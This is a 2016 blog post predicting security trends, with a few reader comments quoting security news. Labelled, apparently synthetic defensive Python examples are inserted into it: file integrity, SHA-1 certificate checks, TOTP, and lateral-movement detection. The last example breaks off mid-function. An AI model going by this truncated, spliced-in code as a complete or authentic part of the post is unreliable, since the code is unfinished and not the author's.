Security trends for 2016

Here are my predictions for trends in information security and cyber security for year 2016.

Year 2015 was pretty bad for information security, and I would say that the trend is worrying. So I expect that the year 2016 will have many information security challenges. If you want to keep yourself up at night, spend some time reading about the latest developments in cybersecurity. In 2015 there were airplanes hacked, cars hacked, and vulnerabilities found in a breathtaking range of sensitive equipment, from TSA locks to voting booths to medical devices. The big picture is even scarier. Former NSA Director Mike McConnell suspects China has hacked “every major corporation” in the US. Those problems will continue in 2016, and some new targets for attacks will be found. The system is broken. It isn’t keeping us, our companies, or our government safe. Worse yet, no one seems to know how to fix it.

Attacks through networks are becoming more common all the time. It will be hard to protect against targeted attacks. Hackers will not only customize malware, but they will increasingly use sophisticated phishing and social engineering tricks to gain access to sensitive data. Attackers usually cover their tracks carefully, so identification can be very difficult. Behind targeted attacks are usually professional criminals. Criminals do not respect geographical borders, and hence attacks are spread evenly everywhere. Companies will struggle to absorb the security threats of combined PC and mobile devices in 2016.

 

EU information security decisions made in late 2015 will have an impact on what comes in 2016: the new EU data protection legislation package was approved, and the EU Court of Justice ruled that the Safe Harbor procedure is invalid. This means that transfers of personal data from EU countries to the United States under Safe Harbor are a violation of law – you need some other agreement for this. The situation will probably get clarified during 2016. Data protection legislation changes will lead to increased fines for the unprepared. Legal uncertainty and big fines are a toxic cocktail for some companies. The combination of stiff penalties and ambiguously worded provisions in the new EU-wide data-protection law, which would replace a patchwork of 28 national laws, raises daunting prospects for companies operating in Europe.

After the huge number of user information leaks in 2015 from all kinds of Internet services, cloud companies will face the challenge of earning trust in their security. You might have dared to trust only “the right cloud services,” since from the traditional information security point of view they seem to have the main things in order; the leaks still raised privacy issues.

New environments will bring new threats. New operating system versions mean that administrators and users are less familiar with the environments. IPv6 will get more widely used, and the security of IPv6 networks is different from IPv4. Organizations are moving to virtualized environments, which are complex and create network layers that can become an attack vector. Growing network virtualization functionality and programmability are both an opportunity and a threat to security. Cyber security research will be important in 2016, as 5G networks will be critical infrastructure on top of which, for example, transport, industry, health and the new operators set up their business around 2020.

The huge amount of information security news is becoming harder and harder to manage in 2016. A key problem in security revelations, as in all other news coverage, is the exponential growth of knowledge. There are a variety of news summaries produced on a daily basis, but they are not enough to get a good picture of what is happening. There are bigger and smaller news items, the impact of which is at times very difficult to assess. SMBs will become a bigger target for cybercriminals. Network and security professionals continue to be among the toughest IT talent to find and hire.

The old way of network security, focused on perimeter defense, is not enough in 2016. The old mantras “encrypt everything” and “secure the perimeter” are not enough. One deceptive truth seems to drive much of the cybersecurity industry down a rabbit hole: if you keep bad actors and bad software out of your system, you have nothing to worry about. It does not work like that anymore. As perimeter security gets stronger, malicious actors are looking for easier entry points to compromise an organisation through the breadth of its digital attack surface. Now malicious actors target “endpoints”—any device or sensor connected to a network—to break into that network. Traditional sandboxing will no longer protect against the growing malware landscape. Today, most private networks have far too many endpoints to properly secure. In an age of “Bring Your Own Device,” the cloud, remote access, and the Internet of Things, there are too many vulnerabilities hackers can exploit. Keep in mind that everything connected to the Internet can, and will, be hacked. To address those threats in 2016, security experts should assume compromise – that hackers and malware already have breached their defenses, or soon will – and instead classify and mitigate threats. In addition to the lock-and-key system of public key infrastructure, you will also need an integrity solution that acts like an alarm. To protect against advanced threats, security professionals will increase their reliance on centralized security management solutions. You need to have prioritization and response plans for various kinds of breaches – with a strong focus on integrity.
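
As an added example (not code from the original post), here is a minimal version of the “integrity solution that acts like an alarm”: a SHA-256 baseline of a directory tree, a later rescan, and a report of everything that was added, removed or modified. The directory tree and the tampering it detects are constructed inside the script so that it runs offline; the file names are placeholders, not paths from the post.

```python
"""File-integrity baseline and alarm.

Added example for this post, not code from the original. Take a SHA-256
baseline of a tree, rescan it later, and report what changed. The tree, its
contents and the tampering below are constructed for the demonstration.
"""
import hashlib
import json
import os
import tempfile
from typing import Dict, List


def sha256_file(path: str) -> str:
    """Hash a file in chunks so large files need not fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_baseline(root: str) -> Dict[str, str]:
    """Map each regular file under root (relative, '/'-separated) to its hash."""
    baseline: Dict[str, str] = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if os.path.islink(full):
                continue  # a symlink is not content; its target is hashed if it is in the tree
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            baseline[rel] = sha256_file(full)
    return baseline


def save_baseline(baseline: Dict[str, str], path: str) -> None:
    """Persist the baseline. In real use keep this copy off the monitored host,
    otherwise an intruder who can edit files can edit the baseline too."""
    with open(path, "w", encoding="utf-8") as handle:
        json.dump(baseline, handle, indent=2, sort_keys=True)


def load_baseline(path: str) -> Dict[str, str]:
    with open(path, "r", encoding="utf-8") as handle:
        return json.load(handle)


def compare(baseline: Dict[str, str], current: Dict[str, str]) -> Dict[str, List[str]]:
    """Diff two scans. Anything listed here is the alarm: investigate it."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
    }


def _write(root: str, rel: str, data: bytes) -> None:
    """Create a file at a '/'-separated relative path, making directories as needed."""
    full = os.path.join(root, *rel.split("/"))
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "wb") as handle:
        handle.write(data)


def demo() -> Dict[str, List[str]]:
    """Build a constructed tree, baseline it, tamper with it, return the alarm."""
    with tempfile.TemporaryDirectory() as root, tempfile.TemporaryDirectory() as store:
        _write(root, "etc/hosts", b"127.0.0.1 localhost\n")
        _write(root, "etc/ssh_config", b"Port 22\n")
        _write(root, "bin/run.sh", b"#!/bin/sh\necho ok\n")
        baseline_path = os.path.join(store, "baseline.json")
        save_baseline(build_baseline(root), baseline_path)

        # Simulated tampering: one file edited, one deleted, one dropped in.
        _write(root, "etc/hosts", b"127.0.0.1 localhost\n10.0.0.9 updates.example\n")
        os.remove(os.path.join(root, "etc", "ssh_config"))
        _write(root, "bin/unexpected.sh", b"#!/bin/sh\necho not in baseline\n")

        return compare(load_baseline(baseline_path), build_baseline(root))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

The design point is in save_baseline: the alarm is only as trustworthy as the baseline, so it has to live somewhere the monitored host cannot rewrite it, and the rescan should be scheduled from outside the host as well.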

Law enforcement versus Silicon Valley tension will continue to be strong throughout 2016. In 2015 law enforcement and politicians on both sides of the Atlantic lined up to repeatedly complain that the web was “going dark” as the result of end-to-end encryption and that this was hampering the investigation of terrorism and other serious crimes. Technologists and cryptographers argue that governments are trying to weaken encryption by demanding some form of privileged access for government. It’s not clear how much encryption the NSA can break. With renewed focus on how encrypted messages can be used to plot terrorist attacks, President Barack Obama’s administration is stepping up pressure on the tech sector to help in the battle. Privacy remains a major counter-argument. It seems that Governments Lie About Encryption Backdoors. Encryption systems weakened by mandated backdoors would not be effective in fighting the terrorists that governments invoke as their reason for wanting those backdoors in the first place.

But this does not stop some government officials from demanding such things, with varying success in different countries. Another fact is that the existence of coded communications is a reality, and the U.S. may not be able to do much about it because nearly everyone living in modern society uses it: encryption protects your bank information, prevents your password from being stolen when you log into a website, and allows all e-commerce transactions to take place securely. Encryption weakened by mandated backdoors would put all of us at an enormous risk of exposure from data breaches and associated online risks. The truth in 2016 is that any form of privileged access for government – i.e., a backdoor – would inevitably weaken crypto-systems and make them more vulnerable to attacks by foreign governments’ intelligence agencies as well as criminals. Juniper’s VPN security hole is proof that government backdoors are bonkers. Encryption backdoors would be a gleeful win-win for terrorists and a horrific lose-lose for you – the bad guys having strong protections for their data, and the rest of us not. A poorly thought-out and crude surveillance technique could have a devastating effect on a country’s internet security – for example, Kazakhstan will force its citizens to install internet backdoors by requiring all Internet users to install a state-issued root certificate by January 1, 2016.

Google, Mozilla and Microsoft are pushing for an early SHA-1 crypto cutoff that could happen in 2016 instead of the earlier planned January 1, 2017, due to recent research showing that SHA-1 is weaker than previously believed, because it has been cracked without enormous effort. Mozilla, Microsoft and now Google are all considering bringing the deadline forward by six months to July 1, 2016. SHA-2 is going to be used as the replacement function for SHA-1. Websites like Facebook and those protected by CloudFlare have implemented a SHA-1 fallback mechanism for those systems that do not support SHA-2. Chrome will start displaying errors if SHA-1 certificates are employed in early 2016 and will completely stop supporting SHA-1 certificates at the end of 2016.
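
To see what the SHA-1 cutoff means in practice, here is an added example (not code from the original post or from any of the browser vendors named above) that reads the signature algorithm OID straight out of a certificate’s DER encoding with the Python standard library and flags SHA-1 and MD5 signatures. Because no real certificate is on the page, the script also builds a structurally valid placeholder certificate for its self-check; the OIDs in the table are the standard ones, everything else is constructed.

```python
"""Flag SHA-1 and MD5 signed X.509 certificates by reading the DER directly.

Added example, not code from the original post or from any browser vendor.
Only the outer structure is walked:
  Certificate ::= SEQUENCE { tbsCertificate, signatureAlgorithm, signatureValue }
The OID inside signatureAlgorithm names the hash the issuer signed with.
No real certificate appears on the page, so fake_certificate() builds a
structurally valid placeholder for the self-check; it is not a real cert.
"""
import base64
import re
from typing import Tuple

OID_NAMES = {
    "1.2.840.113549.1.1.4": "md5WithRSAEncryption",
    "1.2.840.113549.1.1.5": "sha1WithRSAEncryption",
    "1.2.840.113549.1.1.11": "sha256WithRSAEncryption",
    "1.2.840.113549.1.1.12": "sha384WithRSAEncryption",
    "1.2.840.113549.1.1.13": "sha512WithRSAEncryption",
    "1.2.840.10045.4.1": "ecdsa-with-SHA1",
    "1.2.840.10045.4.3.2": "ecdsa-with-SHA256",
    "1.2.840.10045.4.3.3": "ecdsa-with-SHA384",
}
WEAK_HASH = {"md5WithRSAEncryption", "sha1WithRSAEncryption", "ecdsa-with-SHA1"}


def read_tlv(buf: bytes, pos: int) -> Tuple[int, int, int]:
    """Return (tag, value_start, value_end) of the DER element starting at pos."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                      # long form: low 7 bits = number of length bytes
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, pos, pos + length


def decode_oid(value: bytes) -> str:
    """Decode base-128 OID value bytes to dotted notation."""
    arcs = [value[0] // 40, value[0] % 40]
    acc = 0
    for byte in value[1:]:
        acc = (acc << 7) | (byte & 0x7F)
        if not byte & 0x80:                # high bit clear ends the arc
            arcs.append(acc)
            acc = 0
    return ".".join(str(a) for a in arcs)


def signature_algorithm_oid(der: bytes) -> str:
    tag, pos, _ = read_tlv(der, 0)                    # Certificate
    if tag != 0x30:
        raise ValueError("not a DER SEQUENCE")
    tag, _, tbs_end = read_tlv(der, pos)              # tbsCertificate, skipped whole
    if tag != 0x30:
        raise ValueError("tbsCertificate missing")
    tag, alg_start, _ = read_tlv(der, tbs_end)        # signatureAlgorithm
    if tag != 0x30:
        raise ValueError("signatureAlgorithm missing")
    tag, oid_start, oid_end = read_tlv(der, alg_start)
    if tag != 0x06:
        raise ValueError("expected OBJECT IDENTIFIER")
    return decode_oid(der[oid_start:oid_end])


def assess(der: bytes) -> Tuple[str, bool]:
    """(algorithm name or raw OID, True if the signature hash is SHA-1 or MD5)."""
    oid = signature_algorithm_oid(der)
    name = OID_NAMES.get(oid, oid)
    return name, name in WEAK_HASH


def pem_to_der(pem: str) -> bytes:
    body = re.sub(r"-----[A-Z ]+-----", "", pem)
    return base64.b64decode("".join(body.split()))


def to_pem(der: bytes) -> str:
    b64 = base64.b64encode(der).decode("ascii")
    lines = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return "-----BEGIN CERTIFICATE-----\n" + "\n".join(lines) + "\n-----END CERTIFICATE-----\n"


# --- constructed fixture: a DER encoder just large enough to fake a certificate ---
def tlv(tag: int, value: bytes) -> bytes:
    n = len(value)
    if n < 0x80:
        return bytes([tag, n]) + value
    length_bytes = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(length_bytes)]) + length_bytes + value


def encode_oid(dotted: str) -> bytes:
    arcs = [int(a) for a in dotted.split(".")]
    out = bytearray([arcs[0] * 40 + arcs[1]])
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:
            chunk.append(0x80 | (arc & 0x7F))
            arc >>= 7
        out.extend(reversed(chunk))
    return bytes(out)


def fake_certificate(sig_oid: str) -> bytes:
    """Placeholder with the real outer layout; the body is padding, not a cert."""
    tbs = tlv(0x30, tlv(0x02, b"\x02") + tlv(0x04, b"\x00" * 200))  # long-form length on purpose
    alg = tlv(0x30, tlv(0x06, encode_oid(sig_oid)) + tlv(0x05, b""))
    sig = tlv(0x03, b"\x00" * 33)
    return tlv(0x30, tbs + alg + sig)
```

On a real certificate the call is assess(pem_to_der(open("server.pem").read())). Run it over every certificate in the chain except the self-signed root: a root’s own signature is never verified by the client, so its algorithm does not matter, while a SHA-1 signed intermediate fails the cutoff just as a leaf does.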

The use of blockchain technology, a permissionless distributed database based on the bitcoin protocol that runs across a global network of independent computers, will get used more widely than for just Bitcoin virtual money. With bitcoin, the blockchain tracks the exchange of money. But it can also track the exchange of anything else that holds value, including stocks, bonds, and other financial securities. Overstock has already used the blockchain to issue private bonds. The Securities and Exchange Commission has approved a plan from online retailer Overstock.com to issue company stock via the Internet, signaling a significant shift in the way financial securities will be distributed and traded in the years to come. Overstock built its technology under the aegis of a subsidiary called TØ.com, and it plans to offer this “cryptosecurity” tech as a service to other businesses. Nasdaq OMX—the company behind the Nasdaq stock exchange—is using the blockchain to oversee the exchange of private stock. Also several major companies from across both the technology and financial industries—including IBM, Intel, and Cisco as well as the London Stock Exchange Group and big-name banks JP Morgan, Wells Fargo, and State Street—have joined forces to create an alternative to the blockchain with the Linux Foundation.

The use of disk encryption will increase, and there are different ways to do it with different security levels. Microsoft has introduced Windows 10 disk encryption in which the keys are uploaded to Microsoft. This approach has some advantages and disadvantages. The gold standard in disk encryption is end-to-end encryption, where only you can unlock your disk. This is what most companies use, and it seems to work well. It protects data in case your device is lost or stolen. But what if you forget or lose your key? There are certainly cases where it’s helpful to have a backup of your key or password – so keeping a backup of your recovery key in your Microsoft account could be genuinely useful for probably the majority of users that don’t have high security needs. The disadvantage of this approach is that your computer is now only as secure as that database of keys held by Microsoft, which means it may be vulnerable to hackers, foreign governments, and people who can extort Microsoft employees.

Weak and leaked passwords are still a huge security problem in 2016. Passwords are often the weakest part when it comes to securing users’ accounts, as many don’t use complex passwords or they reuse the same password across services. Two-factor authentication – like using a USB stick with a secret token or entering a code sent via text message to your phone – can help to increase security, but many users also find this to be a hassle, as it introduces an additional step to the login process.
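
An added example (not code from the original post) of the second factor an authenticator app provides: RFC 6238 TOTP built on RFC 4226 HOTP, with server-side verification that tolerates a little clock skew and refuses a code that has already been used. TOTP is a generalisation of the “code sent to your phone” idea in the paragraph above, not something the post itself describes; the secret is the RFC test-vector key, not a real one.

```python
"""Time-based one-time codes (RFC 6238 TOTP on top of RFC 4226 HOTP).

Added example, not code from the original post. An authenticator app and the
server share a secret; both derive a short code from it and the current
30-second time step, so no SMS channel is needed. The secret below is the
RFC 4226/6238 test-vector key and must never be used in production.
"""
import base64
import hmac
import struct
import time
from typing import Optional

RFC_TEST_SECRET = b"12345678901234567890"  # RFC test vector, constructed input only


def hotp(secret: bytes, counter: int, digits: int = 6, algorithm: str = "sha1") -> str:
    """HOTP: HMAC over the 8-byte big-endian counter, then dynamic truncation."""
    mac = hmac.new(secret, struct.pack(">Q", counter), algorithm).digest()
    offset = mac[-1] & 0x0F
    code = int.from_bytes(mac[offset:offset + 4], "big") & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp(secret: bytes, for_time: Optional[float] = None, step: int = 30,
         digits: int = 6, algorithm: str = "sha1") -> str:
    """TOTP is HOTP with the counter replaced by the current time step."""
    if for_time is None:
        for_time = time.time()
    return hotp(secret, int(for_time) // step, digits, algorithm)


def verify_totp(secret: bytes, code: str, for_time: Optional[float] = None, step: int = 30,
                digits: int = 6, algorithm: str = "sha1", window: int = 1,
                last_counter: int = -1) -> Optional[int]:
    """Return the time-step counter the code matched, or None.

    window: how many steps of clock skew to accept on either side.
    last_counter: highest counter already consumed for this user; a code for
    that step or an earlier one is refused, so an intercepted code cannot be
    replayed. The caller stores the returned counter as the new last_counter.
    """
    if for_time is None:
        for_time = time.time()
    now = int(for_time) // step
    for counter in range(now - window, now + window + 1):
        if counter <= last_counter:
            continue
        # constant-time comparison so a wrong code does not leak how wrong it was
        if hmac.compare_digest(hotp(secret, counter, digits, algorithm), code):
            return counter
    return None


def secret_from_base32(encoded: str) -> bytes:
    """Authenticator apps exchange the shared secret as unpadded base32."""
    cleaned = encoded.replace(" ", "").upper()
    cleaned += "=" * (-len(cleaned) % 8)
    return base64.b32decode(cleaned)


if __name__ == "__main__":
    print("current code for the test secret:", totp(RFC_TEST_SECRET))
```

Two details matter for the defender: the window must stay small (one step either side is the usual choice), because every extra step multiplies the number of codes an attacker can guess at, and the replay check needs persistent storage of the consumed counter per user, otherwise a code is valid for up to 90 seconds rather than once.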

Google has begun testing a login system that uses phone notifications for authentication instead of passwords: users authenticate by responding to a notification sent to their smartphone. The idea is similar to Yahoo’s recently launched “Account Key,” which also offers a password-free means of signing in involving a push notification sent to your phone that then opens an app where you approve the log-in.

Smartphones will become a more and more security-critical part of your life. “Increasingly, individuals and organisations are adopting password managers and multi-factor authentication technologies to plug some of the holes in password-based authentication.” “We foresee a world where practically everyone uses their smartphone as a multi-factor authentication element. In this world, the smartphone becomes your most valuable asset: something that enables you to unlock your life online and a target for attackers seeking to access your services.”

Expect that the number of mobile vulnerabilities will only grow in 2016. In 2016 we will see increasing numbers of cyber criminals using mobile applications to spread malware. Mobile presents an easy target for cyber criminals, because it is an attack surface that is open and extremely difficult to defend once an app has been released. Android threats will become more than just headline-grabbers. Will 2016 be the year iOS malware goes mainstream?

Critical infrastructures will be highly targeted in 2015. SCADA and ICS networks were not designed for security. Attacks against these systems have increased in recent years. I expect this trend to only get worse. There are still many companies that run their critical systems on Windows XP, as “there are some people who don’t have an option to change.” Many times the OS is running in automation and process control systems that run business and mission-critical systems, both in private sector and government enterprises. For example, the US Navy is using the obsolete operating system Microsoft Windows XP to run critical tasks. It all comes down to money and resources, but if someone is obliged to keep something running on an obsolete system, it’s completely the wrong approach to information security.

Cars were hacked at a record rate in 2015, and they will be hacked at least at the same rate in 2016. Modern cars feature more gadgetry and connected systems, and this will make vehicles just as vulnerable to today’s threats and attacks. I Am The Cavalry has published a Five Star Cyber Safety Framework to mitigate this threat in cars; hopefully car component makers study it.

IoT and smart devices are still at risk. The Internet of Things will continue to emerge, and businesses will need to think about how to protect their smart devices and prepare for the wider adoption of IoT. IoT platforms are not yet the weapon of choice for commercial malware authors – but business beware. Wearables won’t be safe either, as they are built using largely the same, too often vulnerable, technologies as other IoT systems. IoT security is still in its infancy in 2016.

Cyber criminals became more active in 2015, particularly with ransomware. The ransomware problem will continue to be big in 2016. Commercial malware authors will continue to invest heavily, and exploit kits will continue to dominate on the web. Ransomware today is big business. Ransomware takes control of a computer and holds it hostage until the victim pays, usually in the digital currency Bitcoin. As a remedy against ransomware I recommend making sure that IT support or your service provider has a data backup and restore procedure that is operational, practiced and tested. You may need it in 2016 to get your data back without considering paying criminals. To date ransomware has hit Windows users hardest, although Android and MacOS users are now also facing similar extortion.

Ransomware will continue to dominate in 2016, and it is only a question of time before we see things beyond data being ransomed. We have already seen websites being held to ransom with DDoS. Intel’s McAfee Labs also noted a huge spike in ransomware in early 2015, and worries about ransomware in the IoT space—including medical devices. And Kaspersky predicts the “nightmare of ransomware” to continue and “spread to new frontiers” in 2016. The article “Ransomware Is Coming to Medical Devices” tells that, according to a report released recently by Forrester Research, the number one cybersecurity prediction for 2016 is: “We’ll see ransomware for a medical device or wearable.” “It’s definitely feasible from a technical standpoint.” Networked medical devices save lives. Despite the hacking risk, it’s an informed trade-off. Medical device ransomware would be a modern form of highway robbery with lives at stake.

2,232 Comments

  1. Tomi Engdahl says:

    Barry Abrahamson / WordPress.com News:
    WordPress.com enables HTTPS with Let’s Encrypt for new hosted sites with custom domains, will soon expand support to 1M+ sites currently using custom domains

    HTTPS Everywhere: Encryption for All WordPress.com Sites
    https://en.blog.wordpress.com/2016/04/08/https-everywhere-encryption-for-all-wordpress-com-sites/

    We’re proud to support a more secure web — now for all custom domains on WordPress.com.

    Today we are excited to announce free HTTPS for all custom domains hosted on WordPress.com. This brings the security and performance of modern encryption to every blog and website we host.

    Best of all, the changes are automatic — you won’t need to do a thing.

    As the EFF points out as part of their Encrypt the Web initiative, strong encryption protects our users in various ways, including defending against surveillance of content and communications, cookie theft, account hijacking, and other web security flaws.

  2. Tomi Engdahl says:

    Apple Aftermath: Senate Entertains A New Encryption Bill
    http://hackaday.com/2016/04/11/apple-aftermath-senate-entertains-a-new-encryption-bill/

    There are dozens of services (backup comes to mind) where only you have the decryption keys and there is nothing reasonable the provider can do to get your data if you lose your keys. That’s actually a selling point for their service. You might not be anxious to backup your hard drive if you knew the vendor could browse your data when they wanted to do so.

    The proposed bill has some other issues, too. One section states that nothing in the document is meant to require or prohibit a specific design or operating system. However, another clause requires that covered entities provide products and services that are capable of complying with the rule.

    A broad reading of this is troubling. If this were law, entire systems that don’t allow the provider or vendor to decrypt your data could be illegal in the U. S.

    Whole classes of cybersecurity techniques could become illegal, too. For example, many cryptography systems use the property of forward secrecy by generating unrecorded session keys. For example, consider an SSH session. If someone learns your SSH key, they can listen in or interfere with your SSH sessions. However, they can’t take recordings of your previous sessions and decode them. The mechanism is a little different between SSHv1 (which you shouldn’t be using) and SSHv2. If you are interested in the gory details for SSHv2, have a look at section 9.3.7 of RFC 4251.

  3. Tomi Engdahl says:

    Hack The Pentagon, Legally
    http://hackaday.com/2016/04/11/hack-the-pentagon-legally/

    The United States Department of Defense just launched the world’s first government-funded bug bounty program named HackThePentagon. Following the example of Facebook, Google, and other big US companies, the DoD finally provides “a legal avenue for the responsible disclosure of security vulnerabilities”.

    Hack the Pentagon
    The first U.S. Government commercial bug bounty program.
    https://hackerone.com/hackthepentagon

    Thank you for your interest in participating in HackerOne’s Department of Defense (DoD) “Hack the Pentagon” pilot – the first ever U.S. Government commercial Bug Bounty program. This is an effort for the Government to explore new approaches to its cybersecurity challenges, and by evolving to adopt the best practices used by the most successful and secure software companies in the world, the DoD can ensure U.S. systems and warfighters are as secure as possible.

    The Hack the Pentagon Bug Bounty Pilot will start on Monday, April 18, 2016 and end on Thursday, May 12, 2016.

  4. Tomi Engdahl says:

    The Swedish newspaper Dagens Nyheter says today that the army’s servers were used for DDoS attacks on American banks’ online services in 2013. The large banks’ services went down, often for several days.

    It was a normal denial of service attack. Massive amounts of page load requests were sent from the servers to the American banks’ services. The traffic crashed the sites. Exceptional is the fact that the Swedish army’s servers were used as a tool.

    According to Dagens Nyheter, the Swedish military’s servers had long been weak on security.
    The army learned of the hijacking of their servers only when the MSB authority (Myndigheten för samhällsskydd och beredskap) informed them of the matter. According to the army, it was human error.

    Dagens Nyheter further reveals that the situation is still very bad today, as there are very many servers outside the army with similar vulnerabilities around Sweden.

    Source: http://etn.fi/index.php?option=com_content&view=article&id=4244:ruotsin-armeijan-palvelimilta-hyokattiin-pankkeihin&catid=13&Itemid=101

  5. Tomi Engdahl says:

    Sweden Military Servers Hacked, Used in 2013 Attack on US Banks
    http://www.securityweek.com/sweden-military-servers-hacked-used-2013-attack-us-banks

    Swedish military computers were hacked and used in an attack targeting major US banks in 2013, the armed forces said on Monday.

    The attack knocked out the web pages of as many as 20 major US banks and financial institutions, sometimes for several days.

    Speaking to AFP, military spokesman Mikael Abramsson said that a server in the Swedish defense system had a flaw which was exploited by hackers to carry out the attacks, confirming a report in the Swedish daily DN.

    Servers Hacked for DDoS

    “The hacking attack was a kind of wake-up call for us and forced us to take very specific security steps to prevent such a thing from happening again,”

    The servers were used in a so-called DDoS attack (distributed denial of service)

    At the time, the attack, which began in 2012 and continued for months, was one of the biggest ever reported.

    US officials blamed Iran

    DDoS attacks have long been a basic hacker weapon but they have typically involved the use of armies of personal computers tainted with viruses and coordinated to make simultaneous requests at targeted websites.

  6. Tomi Engdahl says:

    3 Steps to Thriving in One of Cybersecurity’s 1 Million Open Positions
    http://www.securityweek.com/3-steps-thriving-one-cybersecuritys-1-million-open-positions

    Cisco’s John Stewart believes there are roughly a million security role vacancies, and this gap is now officially a crisis. We are about a million brains and bodies short of what we need to plug the many growing holes that perforate our highly internetworked environments. Complicating this are legions of posers, intentional and uninformed, feeding off the payrolls of organizations desperate to hire anyone, anyone, who understands what AV, OWASP, or CISSP mean.

    Here is a simple three-step process to be the security professional companies are looking for:

    Step One: Research the Reasons for the Role

    Typically, a new security opening in a company means that something happened. By the time a real job is posted or a recruiter is engaged, there has been some catalyzing event. The first step to getting that job is to research why they’ve decided to post it in the first place.

    Step Two: Develop a comprehensible approach

    The companies who have the most interesting jobs with the broadest scope will likely not know very much about the details of security. Helping them understand why you are a great choice first requires that you educate them on what it is you do.

    Step 3: Start with a call and targeted questions

    You now are knowledgeable on the company, the team, and you have an idea of the problems they may be looking to solve. Finish the picture by establishing yourself as an exceptional candidate, with a call. When you speak with the recruiter or HR executive, ask to follow-up with someone who works there. This gives you the chance to refine your approach and test your assumptions.

    The Results?

    If you do this kind of homework, you will not only be better prepared, but also a better candidate. You will also have a head start as you look at any other opportunities in that same industry.

  7. Tomi Engdahl says:

    Malware Changes Router DNS Settings via Mobile Devices
    http://www.securityweek.com/malware-changes-router-dns-settings-mobile-devices

    Researchers have come across a piece of JavaScript malware that is capable of changing the DNS settings of home routers from mobile devices.

    The malware, dubbed by Trend Micro JS_JITON, has been distributed via compromised websites in Russia and various Asian countries. When these compromised sites are visited from a mobile device, JS_JITON is delivered and it downloads a threat detected as JS_JITONDNS, which is designed to change the DNS settings of the router the infected device is connected to.

    According to Trend Micro, the campaign started in December 2015 and has mainly affected users in Taiwan (27%), Japan (19%), China (12%), the United States (8%) and France (4%). Infections have also been spotted in Canada, Australia, Korea, Hong Kong, the Netherlands and other countries.

  8. Tomi Engdahl says:

    Malware Found in IoT Cameras Sold by Amazon
    http://www.securityweek.com/malware-found-iot-cameras-sold-amazon

    Time was when you could trust big names. Not any more – in fact ‘big names’ are increasingly targeted by the bad guys simply because we do tend to trust them. Amazon is just the latest.

    Mike Olsen, co-founder of Proctorio warned Saturday that a set of security cameras he had purchased from Amazon had been infected with malware. Connecting them to a friend’s computer he didn’t quite find what he expected – they were working, but not in the way he expected.

    He thought it was a bug and used developer tools to look at the code. What he found, however, was not a simple bug, but an iframe linking to a website that aroused suspicions: brenz_pl/rc/.

    “Users,” confirmed Morten Kjaersgaard, CEO at Heimdal Security, “need to be aware that malware can be present in any form of device they buy.

    “At the moment, fast moving consumer electronics are especially exposed. But we also saw this with Lenovo laptops and malware which was pre-installed. Cybercriminals will try to use trusted channels to get access to what they want.”

  9. Tomi Engdahl says:

    Lateral Movement: When Cyber Attacks Go Sideways
    http://www.securityweek.com/lateral-movement-when-cyber-attacks-go-sideways

    Lateral Movement Gives Attackers Additional Points of Control in a Compromised Network

    Finding and stopping cyber attacks has become a key priority for everyone from the C-suite all the way to the frontline security and network administrator. Organizations are learning the hard way that preventative controls will never be 100% perfect, and today’s security teams are increasingly judged on their ability to keep a network intrusion from turning into data loss.

    As a result, the ability to quickly and reliably detect lateral movement in the network is one of the most important emerging skills in information security today. Lateral movement refers to the various techniques attackers use to progressively spread through a network as they search for key assets and data.

    In many ways, the lateral movement attack phase represents the biggest difference between today’s strategic, targeted attacks and the simplistic smash-and-grab attacks of the past. Let’s take a deeper look at lateral movement and how to use this information in your daily security practice.

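
As an added example (not code from the article quoted above), here are two detections for the lateral-movement phase it describes, run over constructed authentication log lines: an account fanning out to many distinct hosts within a short window, and workstation-to-workstation logons, which ordinary users rarely perform. The log format, host names and user names are made up for the demo.

```python
"""Spotting lateral-movement patterns in authentication logs.

Added example, not code from the original article. Two cheap heuristics for
the "progressively spread through a network" behaviour: one account reaching
an unusually large number of distinct hosts inside a short window (fan-out),
and logons from one workstation straight to another. The log lines, the
key=value format, hosts and users are all constructed for this demo; a real
source would be parsed Windows 4624 events or SSH auth logs.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

LINE = re.compile(
    r"^(?P<ts>\S+) user=(?P<user>\S+) src=(?P<src>\S+) dst=(?P<dst>\S+) result=(?P<result>\S+)$"
)

SAMPLE_LOG = """\
2016-04-11T09:00:12 user=alice src=ws-01 dst=srv-files result=success
2016-04-11T09:05:40 user=alice src=ws-01 dst=srv-mail result=success
2016-04-11T09:10:03 user=bob src=ws-02 dst=srv-files result=success
2016-04-11T09:11:15 user=bob src=ws-02 dst=ws-05 result=success
2016-04-11T09:12:27 user=bob src=ws-05 dst=ws-07 result=success
2016-04-11T09:13:02 user=bob src=ws-07 dst=srv-db result=failure
2016-04-11T09:13:09 user=bob src=ws-07 dst=srv-db result=success
2016-04-11T09:14:41 user=bob src=ws-07 dst=srv-backup result=success
2016-04-11T09:00:00 user=carol src=ws-03 dst=srv-files result=success
2016-04-11T15:30:00 user=carol src=ws-03 dst=srv-db result=success
this line is not in the expected format and is skipped
"""


def parse_log(text: str) -> List[Dict]:
    """Turn matching lines into event dicts; unparseable lines are dropped."""
    events = []
    for line in text.splitlines():
        match = LINE.match(line.strip())
        if not match:
            continue
        event = match.groupdict()
        event["ts"] = datetime.strptime(event["ts"], "%Y-%m-%dT%H:%M:%S")
        events.append(event)
    return events


def detect_fan_out(events: List[Dict], max_hosts: int = 4,
                   window: timedelta = timedelta(minutes=10)) -> List[Dict]:
    """Flag accounts that successfully reach max_hosts or more distinct hosts within window."""
    by_user: Dict[str, List[Dict]] = defaultdict(list)
    for event in events:
        if event["result"] == "success":
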